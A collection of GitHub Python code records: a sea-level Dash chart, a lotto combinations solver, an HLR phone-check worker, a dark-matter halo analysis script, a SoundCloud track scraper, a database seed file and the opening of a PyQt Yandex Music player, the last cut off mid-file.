+{"seq_id":"30956944299","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom django_plotly_dash import DjangoDash\nimport pandas as pd\nimport plotly.express as px\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = DjangoDash(\"sealevelrise\", external_stylesheets=external_stylesheets)\n\n# Data preparation & reading:\n\n# Giving names to dataframe columns\ncolumn_names = ['type', '#', 'decimal', 'num of obs',\n                'obs1', 'obs2', 'obs3', 'obs4',\n                'obs5', 'obs6', 'obs7', 'obs8']\n\n# Skip the first 47 comment rows when reading the data\ndf = pd.read_csv('GoGreen/static/Media/data/GMSL_TPJAOS_5.1_199209_202203.txt',\n                 names=column_names, header=0, delimiter='\\s+', skiprows=47)\n\n# 1. Get the first 4 chars of the 'decimal' column and put them into a new column named Year:\n# df['Year'] = df['decimal'].astype(str).str[:4]\n# 2. Group the dataframe by year and get the last row from each group:\n# df2 = df.groupby('Year', as_index=False).last()\nfig = px.line(df, x=df['decimal'], y=df['obs8'])\n\n\nfig.update_layout(xaxis=dict(\n    title='Year',\n    showgrid=False,\n),\n    yaxis=dict(\n        title='Sea Level Change(mm)',\n        showgrid=True,\n        gridcolor='#DCDCDC',\n        gridwidth=1,\n    ),\n    paper_bgcolor='#FFFFFF',\n    plot_bgcolor='#FFFFFF')\n\nfig.update_yaxes(zeroline=True, zerolinewidth=1, zerolinecolor='#DCDCDC')\nfig.update_layout(hovermode=\"x unified\")\nfig.update_traces(hovertemplate=\"
\".join([\n    \"%{y} mm\",\n    \"\"\n    ])\n)\n\n\napp.layout = html.Div([\n    html.Div([dcc.Graph(id='graph', figure=fig)])\n])\n\n\n\n","repo_name":"ekinsuaydin/ClimateChangeApp","sub_path":"GoGreen/dash_apps/finished_apps/sealevelrise.py","file_name":"sealevelrise.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"7574194687","text":"import sys\r\nsys.setrecursionlimit(10**4)\r\ninput = sys.stdin.readline\r\n\r\ndef dfs(arr,temp,idx):\r\n    global k\r\n    global visited\r\n    if len(temp) == 6:\r\n        print(*temp)\r\n        return\r\n    if idx > len(arr):\r\n        return\r\n    if len(temp) + len(arr) - idx + 1 < 6 :\r\n        return\r\n    for i in range(idx,len(arr)):\r\n        dfs(arr, temp + [arr[i]],i + 1)\r\n\r\n\r\n    # for the current idx: either include it or leave it out\r\n\r\n\r\n\r\nwhile 1:\r\n    arr = list(map(int,input().split()))\r\n    visited = [0]*len(arr)\r\n    if arr[0] == 0 :break\r\n    k = arr[0]\r\n    dfs(arr,[],1)\r\n    print()\r\n","repo_name":"wjs2063/BaekJoon","sub_path":"백준/Silver/6603. 로또/로또.py","file_name":"로또.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"73810485047","text":"import check_phone.hlr_api as hlr\nfrom check_phone.models import Request, Requests\n\n\ndef worker(requests_id):\n    requests = Requests.objects.get(id=requests_id)\n    requests_phone = Request.objects.all().filter(requests_id=requests.id)\n    status = {}\n    for req in requests_phone:\n        r = Request.objects.filter(phone=req.phone).first()\n        if r is None or r.hlr_status_code == 5:\n            hlr_server_id = hlr.send_hlr(req.phone)\n            if hlr_server_id is not None:\n                status_code = hlr.get_hlr_result(hlr_server_id)\n                if status_code == -2:\n                    status = 'Неправильный номер'\n                if status_code == -1:\n                    status = 'Номер не обсуживается'\n                if status_code == 0:\n                    status = 'Запрос принят'\n                if status_code == 1:\n                    status = 'Запрос передан оператору'\n                if status_code == 2:\n                    status = 'Номер обсуживается'\n                Request.objects.filter(id=req.id).update(hlr_status=status, hlr_status_code=status_code)\n            else:\n                Request.objects.filter(id=req.id).update(hlr_status=\"Ошибка\")\n        else:\n            Request.objects.filter(id=req.id).update(hlr_status=r.hlr_status, hlr_status_code=r.hlr_status_code)\n","repo_name":"MojsaKirill/hlr","sub_path":"check_phone/hlr_theard.py","file_name":"hlr_theard.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"36350426648","text":"import h5py\nimport numpy as np\nfrom pylab import *\nimport matplotlib.pyplot as plt\nimport scipy.stats as stat\nfrom scipy.optimize import curve_fit\n\ndef logfunc(x,rc):\n    # Hernquist profile #\n    M = 1e14\n    a = 225\n    beta = 4.\n    f = np.log10(M)-np.log10(2.*np.pi)\n    f += np.log10(a)-(1./beta)*np.log10((10**x)**beta + rc**beta)\n    f -= 3.*np.log10(10**x+a)\n    return f\n\ndef func(x,M,a):\n    # Hernquist profile #\n    f = M-np.log10(2.*np.pi)+a-x-3.*np.log10(10**x+10**a)\n    return f\n\ndef bin_volumes(radial_bins):\n    \"\"\"Returns the volumes of the bins. \"\"\"\n\n    single_vol = lambda x: (4.0 / 3.0) * np.pi * x ** 3\n    outer = single_vol(radial_bins[1:])\n    inner = single_vol(radial_bins[:-1])\n    return outer - inner\n\n\ndef bin_centers(radial_bins):\n    \"\"\"Returns the centers of the bins. 
\"\"\"\n\n outer = radial_bins[1:]\n inner = radial_bins[:-1]\n return 0.5 * (outer + inner)\n\n\ndef fit_profile(file, radial_bins, centers):\n\n sim = h5py.File(file, \"r\")\n pos = sim[\"/PartType1/Coordinates\"][:, :]\n mass = sim[\"/PartType1/Masses\"][:] * 1e10\n num = len(mass)\n\n # Geometry info\n boxsize = sim[\"/Header\"].attrs[\"BoxSize\"]\n center = boxsize / 2.0\n\n # Radial coordinates [kpc units]\n r = np.sqrt(np.sum((pos - center) ** 2, axis=1))\n\n SumMasses, _, _ = stat.binned_statistic(x=r, values=np.ones(len(r)) * mass[0], statistic=\"sum\", bins=radial_bins, )\n NumParts, _, _ = stat.binned_statistic(x=r, values=np.ones(len(r)), statistic=\"sum\", bins=radial_bins, )\n density = (SumMasses / bin_volumes(radial_bins)) # Msun/kpc^3\n\n select = np.where((NumParts > 5) & (centers < 1e3))[0]\n xdata = np.log10(centers[select])\n ydata = np.log10(density[select])\n\n # Doing fit #\n popt, pcov = curve_fit(func, xdata, ydata)\n\n M = popt[0]\n rs = 10 ** popt[1]\n return M, rs, num\n\n\ndef read_simulation(folder, snap):\n\n snap_list = np.arange(0,snap,1)\n\n # Define radial bins [log scale, kpc units]\n radial_bins = np.arange(0, 5, 0.1)\n radial_bins = 10 ** radial_bins\n centers = bin_centers(radial_bins) # kpc\n\n # Fit density profile\n M, rs, n_parts = fit_profile(folder+\"/halo_0000.hdf5\", radial_bins, centers)\n\n n_snaps = len(snap_list)\n density_in_bin_per_snap = np.zeros((len(centers), n_snaps))\n velocity_in_bin_per_snap = np.zeros((len(centers), n_snaps))\n\n time = np.zeros(n_snaps)\n core = np.zeros(n_snaps)\n old_time = 0\n\n # Only follow scatter, probability and radius for first ten snaps e.g.\n n_snap_s = 10\n\n # Table containing positions of particle's collisions and time\n n_collisions = np.zeros((n_parts, n_snap_s))\n n_positions = np.zeros((n_parts, n_snap_s))\n\n scatter_rate_per_bin = np.zeros((len(centers), n_snap_s))\n probability_per_bin = np.zeros((len(centers), n_snap_s))\n search_radius_per_bin = np.zeros((len(centers), n_snap_s))\n\n i = 1\n for ii in snap_list:\n\n sim = h5py.File(folder + \"/halo_%04d.hdf5\" % ii, \"r\")\n pos = sim[\"/PartType1/Coordinates\"][:, :]\n mass = sim[\"/PartType1/Masses\"][:] * 1e10\n vel = sim[\"/PartType1/Velocities\"][:, :]\n if ii < n_snap_s:\n nsidm = sim[\"/PartType1/SIDM_events\"][:]\n ids = sim[\"/PartType1/ParticleIDs\"][:]\n prob = sim[\"/PartType1/SIDM_probability\"][:]\n h = sim[\"/PartType1/SIDM_search_radius\"][:]\n timestep = sim[\"/PartType1/Time_step_size\"][:]\n prob *= timestep\n\n # Read units\n unit_length_in_cgs = sim[\"/Units\"].attrs[\"Unit length in cgs (U_L)\"]\n unit_time_in_cgs = sim[\"/Units\"].attrs[\"Unit time in cgs (U_t)\"]\n\n # Geometry info\n boxsize = sim[\"/Header\"].attrs[\"BoxSize\"]\n center = boxsize / 2.0\n\n #Time info\n t = sim[\"/Header\"].attrs[\"Time\"] * 0.979 #Gyr\n time[i-1] = t\n delta_time = t - old_time\n old_time = t\n\n # Radial coordinates [kpc units]\n r = np.sqrt(np.sum((pos - center) ** 2, axis=1))\n\n SumMasses, _, _ = stat.binned_statistic(x=r, values=np.ones(len(r)) * mass[0], statistic=\"sum\",\n bins=radial_bins, )\n density = (SumMasses / bin_volumes(radial_bins)) # Msun/kpc^3\n density_in_bin_per_snap[:, i-1] = density\n\n # Doing fit #\n select = np.where( (centers>4) & (centers<1e4) )[0]\n popt, pcov = curve_fit(logfunc, np.log10(centers[select]), np.log10(density[select]))\n core[i-1] = popt[0]\n\n # Check 1D velocity dispersion\n vel *= unit_length_in_cgs / unit_time_in_cgs # cm/s\n vel *= 1e-5 # km/s\n\n std_vel_x, _, _ = 
stat.binned_statistic(x=r, values=vel[:, 0], statistic=\"std\", bins=radial_bins, )\n std_vel_y, _, _ = stat.binned_statistic(x=r, values=vel[:, 1], statistic=\"std\", bins=radial_bins, )\n std_vel_z, _, _ = stat.binned_statistic(x=r, values=vel[:, 2], statistic=\"std\", bins=radial_bins, )\n std_vel = np.sqrt(std_vel_x ** 2 + std_vel_y ** 2 + std_vel_z ** 2) / np.sqrt(3.)\n velocity_in_bin_per_snap[:, i-1] = std_vel\n\n if i < n_snap_s:\n ids_sorted = np.argsort(ids)\n r = r[ids_sorted]\n nsidm = nsidm[ids_sorted]\n prob = prob[ids_sorted]\n part_h = h[ids_sorted]\n\n n_collisions[:, i - 1] = nsidm\n n_positions[:, i - 1] = r\n\n for j in range(0, len(radial_bins) - 1):\n\n select = np.where((n_positions[:, i - 1] >= radial_bins[j]) &\n (n_positions[:, i - 1] < radial_bins[j + 1]))[0]\n\n num_parts = len(select)\n if num_parts > 1:\n\n if i == 1: num_collisions = np.sum(n_collisions[select, i - 1])\n if i > 1: num_collisions = np.sum(n_collisions[select, i - 1]) - np.sum(n_collisions[select, i - 2])\n if num_collisions > 0: scatter_rate_per_bin[j, i - 1] = num_collisions / (delta_time * num_parts)\n probability_per_bin[j, i - 1] = np.median(prob[select])\n search_radius_per_bin[j, i - 1] = np.median(part_h[select])\n\n i += 1 # update counter\n\n\n density = np.zeros((len(centers), 5))\n velocity = np.zeros((len(centers), 5))\n density[:,0] = np.mean(density_in_bin_per_snap[:, 0:2], axis=1)\n density[:,1] = np.mean(density_in_bin_per_snap[:, 8:12], axis=1)\n density[:,2] = np.mean(density_in_bin_per_snap[:, 18:22], axis=1)\n density[:,3] = np.mean(density_in_bin_per_snap[:, 38:42], axis=1)\n #density[:,4] = np.mean(density_in_bin_per_snap[:, 78:82], axis=1)\n velocity[:,0] = np.mean(velocity_in_bin_per_snap[:, 0:2], axis=1)\n velocity[:,1] = np.mean(velocity_in_bin_per_snap[:, 8:12], axis=1)\n velocity[:,2] = np.mean(velocity_in_bin_per_snap[:, 18:22], axis=1)\n velocity[:,3] = np.mean(velocity_in_bin_per_snap[:, 38:42], axis=1)\n #velocity[:,4] = np.mean(velocity_in_bin_per_snap[:, 78:82], axis=1)\n\n scatter_rate = np.mean(scatter_rate_per_bin[:, 0:i], axis=1)\n probability = np.mean(probability_per_bin[:, 0:i], axis=1)\n search_radius = np.mean(search_radius_per_bin[:, 0:i], axis=1)\n\n return centers, density, velocity, scatter_rate, probability, search_radius, time, core\n\n\ndef plot_core_evolution(x, y):\n\n # Plot parameters\n params = {\n \"font.size\": 12,\n # \"font.family\": \"Times\",\n # \"text.usetex\": True,\n \"figure.figsize\": (4, 3),\n \"figure.subplot.left\": 0.18,\n \"figure.subplot.right\": 0.95,\n \"figure.subplot.bottom\": 0.18,\n \"figure.subplot.top\": 0.95,\n \"figure.subplot.wspace\": 0.45,\n \"figure.subplot.hspace\": 0.35,\n \"lines.markersize\": 2,\n \"lines.linewidth\": 2,\n }\n rcParams.update(params)\n\n figure()\n ax = plt.subplot(1, 1, 1)\n plt.grid(\"True\")\n\n plt.plot(x, y, '-', color='tab:blue')\n #plt.axis([1e9, 1e15, 1, 20])\n plt.xlabel(\"Time [Gyr]\")\n plt.ylabel(\"Core Radius [kpc]\")\n ax.tick_params(direction='in', axis='both', which='both', pad=4.5)\n plt.savefig(output_path + \"core_evolution.png\", dpi=200)\n plt.close()\n\n\ndef plot_probability(x, y):\n\n # Plot parameters\n params = {\n \"font.size\": 12,\n # \"font.family\": \"Times\",\n # \"text.usetex\": True,\n \"figure.figsize\": (4, 3),\n \"figure.subplot.left\": 0.18,\n \"figure.subplot.right\": 0.95,\n \"figure.subplot.bottom\": 0.18,\n \"figure.subplot.top\": 0.95,\n \"figure.subplot.wspace\": 0.45,\n \"figure.subplot.hspace\": 0.35,\n \"lines.markersize\": 2,\n 
\"lines.linewidth\": 2,\n }\n rcParams.update(params)\n\n figure()\n ax = plt.subplot(1, 1, 1)\n plt.grid(\"True\")\n\n plt.plot(x, y, '-', color='tab:blue')\n plt.axis([1e0, 1e3, 1e-4,1e0])\n plt.xscale('log')\n plt.yscale('log')\n plt.xlabel(\"Radius [kpc]\")\n plt.ylabel(\"Probability\")\n ax.tick_params(direction='in', axis='both', which='both', pad=4.5)\n plt.savefig(output_path + \"probability.png\", dpi=200)\n plt.close()\n\ndef plot_scatter_rate(x, y):\n\n # Plot parameters\n params = {\n \"font.size\": 12,\n # \"font.family\": \"Times\",\n # \"text.usetex\": True,\n \"figure.figsize\": (4, 3),\n \"figure.subplot.left\": 0.18,\n \"figure.subplot.right\": 0.95,\n \"figure.subplot.bottom\": 0.18,\n \"figure.subplot.top\": 0.95,\n \"figure.subplot.wspace\": 0.45,\n \"figure.subplot.hspace\": 0.35,\n \"lines.markersize\": 2,\n \"lines.linewidth\": 2,\n }\n rcParams.update(params)\n\n figure()\n ax = plt.subplot(1, 1, 1)\n plt.grid(\"True\")\n\n plt.plot(x, y, '-', color='tab:blue')\n plt.axis([1e0, 1e3, 1e-4, 1e2])\n plt.xscale('log')\n plt.yscale('log')\n plt.xlabel(\"Radius [kpc]\")\n plt.ylabel(\"Scatter rate [particle$^{-1}$ Gyr$^{-1}$]\")\n ax.tick_params(direction='in', axis='both', which='both', pad=4.5)\n plt.savefig(output_path + \"scatter_rate.png\", dpi=200)\n plt.close()\n\ndef plot_search_radius(x, y):\n\n # Plot parameters\n params = {\n \"font.size\": 12,\n # \"font.family\": \"Times\",\n # \"text.usetex\": True,\n \"figure.figsize\": (4, 3),\n \"figure.subplot.left\": 0.18,\n \"figure.subplot.right\": 0.95,\n \"figure.subplot.bottom\": 0.18,\n \"figure.subplot.top\": 0.95,\n \"figure.subplot.wspace\": 0.45,\n \"figure.subplot.hspace\": 0.35,\n \"lines.markersize\": 2,\n \"lines.linewidth\": 2,\n }\n rcParams.update(params)\n\n figure()\n ax = plt.subplot(1, 1, 1)\n plt.grid(\"True\")\n\n plt.plot(x, y, '-', color='tab:blue')\n plt.axis([1e0, 1e3, 1e-2,1e2])\n plt.xscale('log')\n plt.yscale('log')\n plt.xlabel(\"Radius [kpc]\")\n plt.ylabel(\"Search radius [kpc]\")\n ax.tick_params(direction='in', axis='both', which='both', pad=4.5)\n plt.savefig(output_path + \"search_radius.png\", dpi=200)\n plt.close()\n\n\ndef plot_profile_evolution(x, rho, vel):\n\n # Plot parameters\n params = {\n \"font.size\": 12,\n # \"font.family\": \"Times\",\n # \"text.usetex\": True,\n \"figure.figsize\": (7, 3),\n \"figure.subplot.left\": 0.1,\n \"figure.subplot.right\": 0.95,\n \"figure.subplot.bottom\": 0.18,\n \"figure.subplot.top\": 0.95,\n \"figure.subplot.wspace\": 0.35,\n \"figure.subplot.hspace\": 0.25,\n \"lines.markersize\": 2,\n \"lines.linewidth\": 2,\n }\n rcParams.update(params)\n\n figure()\n ax = plt.subplot(1, 2, 1)\n plt.grid(\"True\")\n\n plt.plot(x, rho[:,0], '-', color='tab:blue',label='t = 0 Gyr')\n plt.plot(x, rho[:,1], '-', color='tab:orange',label='t = 1 Gyr')\n plt.plot(x, rho[:,2], '-', color='tab:green',label='t = 2 Gyr')\n plt.plot(x, rho[:,3], '-', color='tab:red',label='t = 4 Gyr')\n #plt.plot(x, rho[:,4], '-', color='tab:purple',label='t = 8 Gyr')\n\n plt.axis([1e0,1e3, 1e5, 1e9])\n plt.xscale('log')\n plt.yscale('log')\n\n plt.xlabel(\"Radius [kpc]\")\n plt.ylabel(\"Density [M$_{\\odot}$/kpc$^{3}$]\")\n ax.tick_params(direction='in', axis='both', which='both', pad=4.5)\n plt.legend(labelspacing=0.2, handlelength=1.5, handletextpad=0.4, frameon=False)\n\n ax = plt.subplot(1, 2, 2)\n plt.grid(\"True\")\n\n plt.plot(x, vel[:,0], '-', color='tab:blue',label='t = 0 Gyr')\n plt.plot(x, vel[:,1], '-', color='tab:orange',label='t = 1 Gyr')\n plt.plot(x, vel[:,2], 
'-', color='tab:green',label='t = 2 Gyr')\n plt.plot(x, vel[:,3], '-', color='tab:red',label='t = 4 Gyr')\n #plt.plot(x, vel[:,4], '-', color='tab:purple',label='t = 8 Gyr')\n\n plt.axis([1e0, 1e3, 0, 600])\n plt.xscale('log')\n plt.xlabel(\"Radius [kpc]\")\n plt.ylabel(\"Velocity dispersion [km/s]\")\n ax.tick_params(direction='in', axis='both', which='both', pad=4.5)\n plt.savefig(output_path + \"profile_evolution.png\", dpi=200)\n plt.close()\n\nif __name__ == '__main__':\n from utils import *\n\n output_path = args.output\n folder = args.directory\n snapshot = args.snapshot\n\n centers, density, velocity, \\\n scatter_rate, probability, \\\n search_radius, time, core = read_simulation(folder, snapshot)\n\n plot_profile_evolution(centers, density, velocity)\n plot_core_evolution(time, core)\n plot_probability(centers, probability)\n plot_scatter_rate(centers, scatter_rate)\n plot_search_radius(centers, search_radius)\n","repo_name":"correac/SIDMPlots","sub_path":"prev/IsolatedHalo.py","file_name":"IsolatedHalo.py","file_ext":"py","file_size_in_byte":13305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3368624416","text":"\n# -*- coding: utf-8 -*-\nfrom locale import *\nimport sys,os\n\nproject_dir = '../tr/tr/'\n\nsys.path.append(project_dir)\nos.environ['DJANGO_SETTINGS_MODULE'] = 'settings'\nimport django\ndjango.setup()\n\nimport soundcloud\nfrom music.models import *\nfrom datetime import datetime, date, time\n\n\nclient = soundcloud.Client(client_id='dce5652caa1b66331903493735ddd64d')\npage_size = 200\ngenres_list = SoundGenres.objects.values('name')\ngenres_list_names = [name['name'] for name in genres_list]\n\nг_rus_list_1 = [\n\"Габриэль\",\n\"Гаврик & Олександр Положинський\",\n\"ГадЖеТы\",\n\"Гайдай\",\n\"Гайдамаки\",\n\"Гайк\",\n\"Гайтана\",\n\"Галактика\",\n\"Галамарт\",\n\"Галамартовна\",\n\"Галина\",\n\"Галина Боб\",\n\"Галина Журавлёва (Журга)\",\n\"Галина Комиссарова\",\n\"Галина Комиссарова и Михаил Кармаш\",\n\"Галина Ненашева\",\n\"Галина Хомчик\",\n\"Галина Шапкина\",\n\"Галина Юдина\",\n\"Галя Боб\",\n\"Галя Журавлёва\",\n\"Галямин Сергей feat. Samoel\",\n\"Гамора\",\n\"Ганвест\",\n\"Гансэлло\",\n\"Гардемарины Вперед\",\n\"Гари Гудини feat. M.J. Marley (Стиль Бандит)\",\n\"Гарик Кричевский\",\n\"Гарик Мошенник & DJ Favorite\",\n\"Гарик Погорелов\",\n\"Гарик Сукачёв\",\n\"Гарик-Ниагарик\",\n\"Гармония\",\n\"Гарри Польский\",\n\"Гарри Топор\",\n\"Гаррий Манукян\",\n\"Гаттака\",\n\"Гаяне Аракелян\",\n\"Гейдар Багиров\",\n\"Гела Гуралиа\",\n\"Гельдуш Османов\",\n\"Гена Гром\",\n\"Гена Селезнев\",\n\"Геннадий Белов\",\n\"Геннадий Виноградов\",\n\"Геннадий Витер\",\n\"Геннадий Вяземский\",\n\"Геннадий Гладков\",\n\"Геннадий Горелик\",\n\"Геннадий Жаров\",\n\"Геннадий Иванцов\",\n\"Геннадий Лясковский\",\n\"Геннадий Парыкин\",\n\"Геннадий Пугачев\",\n\"Геннадий Ура\",]\n\nг_rus_list_2 = [\n\"Георгий Колдун\",\n\"Георгий Лысенко\",\n\"Георгий Свиридов\",\n\"Гера Герасимов\",\n\"Гера Грач\",\n\"Геракл\",\n\"Герб feat. 
DJ Jedy\",\n\"Герман Грач\",\n\"Герман Титов\",\n\"Герман Чепелянский\",\n\"Герман Черных\",\n\"Герои\",\n\"Герои и Belka\",\n\"Герои Комиксов\",\n\"Герр Антон\",\n\"Гетман\",\n\"ГЕЦе\",\n\"Гига\",\n\"Гильzа\",\n\"Главная Роль\",\n\"Гладков Григорий\",\n\"Глаза\",\n\"Гламур\",\n\"Глеб Матвейчук\",\n\"Глюк’oza\",\n\"Глюкоzа\",\n\"Глюкоза\",\n\"Гоголь-Моголь\",\n\"Год Змеи\",\n\"Голди\",\n\"Голод\",\n\"Голубые Береты\",\n\"Гордей Белов\",\n\"Город 312\",\n\"Горшенев\",\n\"Горячие головы\",\n\"Горячий Шоколад\",\n\"Горячий шоколад и Тринити\",\n\"Гослинг\",\n\"Гости Из Будущего\",\n\"Гостья из будущего\",\n\"Гоша Style\",\n\"Гоша Грачевский\",\n\"Гоша Куценко\",\n\"Гоша Матарадзе\",\n\"гр LIFE\",\n\"гр. Бумер\",\n\"гр. Пропорции feat. Кэти Эбель\",\n\"Градусы\",\n\"Гранат\",\n\"Гранды\",\n\"Граф Гагарин\",\n\"Гребенщиков Михаил\",\n\"Грейс\",\n\"Гречка\",\n\"Грешник\",\n\"Грибы\",\n\"Григ\",\n\"Григорий Герасимов\",\n\"Григорий Гладков\",\n\"Григорий Данской\",\n\"Григорий Есаян\",\n\"Григорий Лепс\",\n\"Григорий Филь\",\n\"Григорий Юрченко\",\n\"Грин Данилов\",\n\"Гринджоли\",\n\"Гринс��рин\",\n\"Гриша Гост & Глеб Калюжный\",\n\"Гриша Заречный\",\n\"Гриша Петров\",\n\"Грозовой Перевал\",\n\"Грот\",\n\"Грузман\",\n\"Группа 5 Плюс\",]\n\nг_rus_list_3 = [\n\"Группа F1\",\n\"Группа Ferramon\",\n\"Группа Fm\",\n\"Группа H2O\",\n\"Группа PLAY\",\n\"Группа Radио\",\n\"Группа А.Т.А.С.\",\n\"Группа Аня\",\n\"Группа Братва\",\n\"Группа Весна\",\n\"Группа Владимир\",\n\"Группа Евразия\",\n\"Группа Запретка\",\n\"Группа Колыма\",\n\"Группа Круче Тучи\",\n\"Группа Крылья\",\n\"Группа Купажъ\",\n\"Группа Лиц\",\n\"Группа Маша Пирожкова\",\n\"Группа Мира\",\n\"Группа Мишель\",\n\"Группа Мурkiss\",\n\"Группа Навстречу Солнцу\",\n\"Группа Одесса\",\n\"Группа Олега Ястребова\",\n\"Группа Онлайн\",\n\"Группа Опаньки\",\n\"Группа Панама\",\n\"Группа ПМ\",\n\"Группа Порт Петровск\",\n\"Группа Р\",\n\"Группа Регион 42 & Александр Кузнецов\",\n\"Группа РЭДЛ?\",\n\"Группа Ряженка\",\n\"Группа Самоцветы\",\n\"Группа Санкции\",\n\"Группа Сентябрь\",\n\"Группа Стаса Намина\",\n\"Группа Улицы\",\n\"Группа Централ\",\n\"Гузель Уразова\",\n\"Гузель Хасанова\",\n\"Гульназ\",\n\"Гурмэ\",\n\"Гурченко and Dj Грув\",\n\"Гусейн Гасанов\",\n\"Гюльназ Гаджикурбанова\",\n]\n\n\n\nlitera = SoundSymbol.objects.get(name=\"Г\")\n\ncount = 0\n\nfor tag in г_rus_list_1:\n tracks = client.get('/tracks', q=tag, limit=page_size, linked_partitioning=1)\n if tracks:\n for track in tracks.collection:\n created_at = track.created_at\n created_at = datetime.strptime('Jun 1 2005 1:33PM', '%b %d %Y %I:%M%p')\n if track.description:\n description = track.description[:500]\n else:\n description=None\n try:\n Music.objects.get(id=track.id)\n except:\n if track.genre and track.release_year and track.duration > 90000 and track.genre in genres_list_names:\n try:\n self_tag = SoundTags.objects.get(name=tag, symbol=litera)\n except:\n self_tag = SoundTags.objects.create(name=tag, symbol=litera)\n genre =SoundGenres.objects.get(name=track.genre.replace(\"'\", '') )\n new_track = Music.objects.create(id=track.id, tag=self_tag, artwork_url=track.artwork_url, created_at=created_at, duration=track.duration, genre=genre, description=description, title=track.title, uri=track.uri, release_year=track.release_year)\n count = count + 1\n while tracks.next_href != None and count < 2000:\n tracks = client.get(tracks.next_href, limit=page_size, linked_partitioning=1)\n for track in tracks.collection:\n created_at = track.created_at\n created_at = 
datetime.strptime('Jun 1 2005 1:33PM', '%b %d %Y %I:%M%p')\n if track.description:\n description = track.description[:500]\n else:\n description=None\n try:\n Music.objects.get(id=track.id)\n except:\n if track.genre and track.release_year and track.duration > 90000 and track.genre in genres_list_names:\n try:\n self_tag = SoundTags.objects.get(name=tag, symbol=litera)\n except:\n self_tag = SoundTags.objects.create(name=tag, symbol=litera)\n genre =SoundGenres.objects.get(name=track.genre.replace(\"'\", '') )\n new_track = Music.objects.create(id=track.id, tag=self_tag, artwork_url=track.artwork_url, created_at=created_at, duration=track.duration, genre=genre, description=description, title=track.title, uri=track.uri, release_year=track.release_year)\n count = count + 1\n","repo_name":"interesnij/django-social-network","sub_path":"common/parsing_soundcloud/rus/parsing_г_rus.py","file_name":"parsing_г_rus.py","file_ext":"py","file_size_in_byte":8204,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40579259982","text":"from app.models import db, Hit, Text\n\ndef seed_hits():\n\n text_1 = Text.query.get(1).content\n text_2 = Text.query.get(2).content\n loc_1 = text_2.index('salvation')\n loc_2 = text_2.index('faith')\n loc_3 = text_2.index('faith', loc_2+1)\n\n hits = [\n Hit(\n text_id=1,\n key_id=1,\n claim_id=1,\n location=text_1.index('test'),\n word_count=1,\n created_by=1,\n ),\n Hit(\n text_id=2,\n key_id=3,\n claim_id=2,\n location=loc_1,\n word_count=1,\n created_by=1,\n ),\n Hit(\n text_id=2,\n key_id=3,\n claim_id=2,\n location=text_2.index('salvation', loc_1+1),\n word_count=1,\n created_by=1,\n ),\n Hit(\n text_id=2,\n key_id=4,\n claim_id=2,\n location=loc_2,\n word_count=1,\n created_by=1,\n ),\n Hit(\n text_id=2,\n key_id=4,\n claim_id=2,\n location=loc_3,\n word_count=1,\n created_by=1,\n ),\n Hit(\n text_id=2,\n key_id=4,\n claim_id=2,\n location=text_2.index('faith', loc_3+1),\n word_count=1,\n created_by=1,\n ),\n ]\n\n db.session.bulk_save_objects(hits)\n db.session.commit()\n\n# Uses a raw SQL query to TRUNCATE the hits table.\n# SQLAlchemy doesn't have a built in function to do this\n# TRUNCATE Removes all the data from the table, and resets\n# the auto incrementing primary key\ndef undo_hits():\n db.session.execute('TRUNCATE hits;')\n db.session.commit()\n","repo_name":"scottgit/evidential","sub_path":"app/seeds/hits.py","file_name":"hits.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"31473308633","text":"import sys\nimport requests\nimport os\nimport yandex_api as ya\n\nfrom PyQt5 import QtCore, QtGui\nfrom PyQt5.QtCore import QCoreApplication, QUrl\nfrom PyQt5.QtWidgets import QApplication, QSlider, QMessageBox, QMenu, QMainWindow, \\\n QDialog, QAction, QListWidgetItem\nfrom main_window import Ui_MainWindow\nfrom PyQt5.QtMultimedia import QMediaPlayer, QMediaContent, QMediaPlaylist\nfrom enter_yandex_music import Yam_Dialog\n\n\nLOGIN = os.getenv('username')\nPASSWORD = os.getenv('password')\n\nclient = ya.YandexClient((LOGIN, PASSWORD))\n# list_track = client.get_ru_chart().tracks\nlist_track = list()\n\n\ndef get_url_by_track(track_id, client_ya):\n track = client_ya.track_by_id(track_id)\n return track.download_link()\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.player = QMediaPlayer()\n self.current_playlist = 
QMediaPlaylist(self.player)\n self.userAction = -1 # 0- stopped, 1- playing 2-paused\n self.player.stateChanged.connect(self.state_changed)\n self.player.positionChanged.connect(self.position_changed)\n self.player.volumeChanged.connect(self.volume_changed)\n self.player.setVolume(60)\n self.player.durationChanged.connect(self.set_duration)\n self.setWindowTitle('Music Player')\n self.statusBar().showMessage('No Media, Volume: %d' % self.player.volume())\n self.slider.setMinimum(0)\n self.slider.setMaximum(100)\n self.slider.setTracking(False)\n self.slider.sliderMoved.connect(self.seek_position)\n self.play_button.clicked.connect(self.play_handler)\n self.pause_button.clicked.connect(self.pause_handler)\n self.stop_button.clicked.connect(self.stop_handler)\n self.volume_decrease_button.clicked.connect(self.decrease_volume)\n self.volume_increase_button.clicked.connect(self.increase_volume)\n self.downloaded_tracks.itemDoubleClicked.connect(self.open_file)\n self.enter_yandex_button.clicked.connect(self.enter_yandex)\n self.prev_button.clicked.connect(self.prevItemPlaylist)\n self.next_button.clicked.connect(self.nextItemPlaylist)\n self.track_path = 'tracks/'\n self.fill_downloaded_tracks()\n self.search_button.clicked.connect(self.search)\n\n for track in list_track:\n item = QListWidgetItem(str(track) + ' — ' + track.duration)\n item.setData(256, track.id)\n self.playlist_window.addItem(item)\n\n self.playlist_window.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.playlist_window.customContextMenuRequested.connect(self.context_menu)\n self.playlist_window.itemDoubleClicked.connect(self.add_online_song)\n\n 